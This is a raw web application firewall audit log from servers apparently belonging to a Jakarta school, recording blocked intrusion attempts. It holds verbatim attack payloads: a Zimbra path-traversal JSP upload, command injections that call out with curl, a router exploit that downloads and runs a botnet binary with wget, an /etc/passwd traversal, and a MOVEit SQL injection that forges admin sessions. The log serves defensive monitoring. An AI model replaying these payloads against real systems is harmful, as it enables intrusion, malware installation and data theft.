perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/120.0 Safari/537.36 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 169051491 --98fb5039-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --98fb5039-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --98fb5039-E-- --98fb5039-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748339690410558 4436 (- - -) Stopwatch2: 1748339690410558 4436; combined=3285, p1=362, p2=2896, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98fb5039-Z-- --93fdce51-A-- [27/May/2025:17:55:51 +0700] aDWaN2TuEZUBy5rh0saNOQAAABg 103.236.140.4 52400 103.236.140.4 8181 --93fdce51-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 178.128.204.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 178.128.204.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0; LG-D850 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.97 Mobile Safari/537.36 Accept-Charset: utf-8 --93fdce51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93fdce51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748343351067077 12579 (- - -) Stopwatch2: 1748343351067077 12579; combined=23883, p1=293, p2=0, p3=0, p4=0, p5=11814, sr=75, sw=1, l=0, gc=11775 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93fdce51-Z-- --89d0e258-A-- [27/May/2025:18:07:36 +0700] aDWc-FuSH_Spa4YU2Zm3OAAAAMg 103.236.140.4 52472 103.236.140.4 8181 --89d0e258-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 172 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Content-Type: application/x-thrift X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168513587 --89d0e258-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0qa44pgpeoi1bmoheage4f7z3hnyr1oe.oast.live`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --89d0e258-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --89d0e258-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748344056300919 3480 (- - -) Stopwatch2: 1748344056300919 3480; combined=2076, p1=489, p2=1517, p3=21, p4=23, p5=25, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89d0e258-Z-- --2278b851-A-- [27/May/2025:18:42:29 +0700] aDWlJVuSH_Spa4YU2Zm3WwAAAMI 103.236.140.4 53052 103.236.140.4 8181 --2278b851-B-- POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160763161 --2278b851-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --2278b851-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2278b851-E-- --2278b851-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748346149576921 5508 (- - -) Stopwatch2: 1748346149576921 5508; combined=3561, p1=498, p2=3033, p3=0, p4=0, p5=29, sr=91, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2278b851-Z-- --48f4f74d-A-- [27/May/2025:18:42:29 +0700] aDWlJd6cNBpj1JOkpQlfaAAAAFc 103.236.140.4 53054 103.236.140.4 8181 --48f4f74d-B-- POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 160763164 --48f4f74d-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --48f4f74d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48f4f74d-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748346149594396 4989 (- - -) Stopwatch2: 1748346149594396 4989; combined=3588, p1=424, p2=3135, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48f4f74d-Z-- --46454a77-A-- [27/May/2025:19:45:22 +0700] aDWz4hLFq2VRfSzm6b8goQAAAIk 103.236.140.4 56784 103.236.140.4 8181 --46454a77-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 172 User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Content-Type: application/x-thrift X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 159941940 --46454a77-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0qa44pgpeoi1bmoheageom1awgxkdh41.oast.live`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --46454a77-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --46454a77-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748349922409301 3199 (- - -) Stopwatch2: 1748349922409301 3199; combined=1964, p1=440, p2=1456, p3=20, p4=23, p5=25, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46454a77-Z-- --e7eea556-A-- [27/May/2025:20:57:25 +0700] aDXExWTuEZUBy5rh0saObgAAAAc 103.236.140.4 57296 103.236.140.4 8181 --e7eea556-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.29.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.29.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e7eea556-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7eea556-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748354245189849 849 (- - -) Stopwatch2: 1748354245189849 849; combined=351, p1=305, p2=0, p3=0, p4=0, p5=46, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7eea556-Z-- --690ac216-A-- [27/May/2025:20:59:28 +0700] aDXFQGTuEZUBy5rh0saOcgAAAAo 103.236.140.4 57304 103.236.140.4 8181 --690ac216-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.135.134.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.135.134.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --690ac216-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --690ac216-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748354368803895 2025 (- - -) Stopwatch2: 1748354368803895 2025; combined=1045, p1=335, p2=683, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --690ac216-Z-- --bdffa830-A-- [27/May/2025:21:08:37 +0700] aDXHZRLFq2VRfSzm6b8iEQAAAJI 103.236.140.4 33634 103.236.140.4 8181 --bdffa830-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20neon.arm7%3B%20wget%20http%3A%2F%2F209.141.34.106%2Fdwrioej%2Fneon.arm7%3B%20chmod%20777%20neon.arm7%3B%20.%2Fneon.arm7%20router1 HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 176.65.148.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.148.236 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --bdffa830-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bdffa830-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748354917421661 883 (- - -) Stopwatch2: 1748354917421661 883; combined=406, p1=372, p2=0, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bdffa830-Z-- --a72b5938-A-- [27/May/2025:21:41:17 +0700] aDXPDRLFq2VRfSzm6b8lGgAAAJA 103.236.140.4 45674 103.236.140.4 8181 --a72b5938-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.90.236.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.90.236.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a72b5938-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a72b5938-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748356877416270 3208 (- - -) Stopwatch2: 1748356877416270 3208; combined=1388, p1=486, p2=872, p3=0, p4=0, p5=30, sr=144, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a72b5938-Z-- --91a2d10a-A-- [27/May/2025:23:04:16 +0700] aDXigFuSH_Spa4YU2Zm8_gAAAM0 103.236.140.4 46590 103.236.140.4 8181 --91a2d10a-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/118.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159946951 --91a2d10a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --91a2d10a-E-- --91a2d10a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748361856395714 1843 (- - -) Stopwatch2: 1748361856395714 1843; combined=573, p1=411, p2=132, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91a2d10a-Z-- --3d641925-A-- [27/May/2025:23:04:31 +0700] aDXij96cNBpj1JOkpQlk9wAAAEk 103.236.140.4 46596 103.236.140.4 8181 --3d641925-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: siLockLongTermInstID=0; SenayanMember=81ho8an79e7bu0r4u797pjsoe1 X-Varnish: 159946957 --3d641925-C-- --3d641925-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d641925-E-- --3d641925-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748361871432805 3628 (- - -) Stopwatch2: 1748361871432805 3628; combined=1855, p1=512, p2=1313, p3=0, p4=0, p5=29, sr=83, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d641925-Z-- --c433af6d-A-- [27/May/2025:23:04:37 +0700] aDXild6cNBpj1JOkpQlk-QAAAFA 103.236.140.4 46606 103.236.140.4 8181 --c433af6d-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xdnTC3Nxx4RVav86ifkRYMLZwI');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET IpAddress='206.82.6.62' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xdnTC3Nxx4RVav86ifkRYMLZwI'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=81ho8an79e7bu0r4u797pjsoe1 X-Varnish: 168684493 --c433af6d-C-- 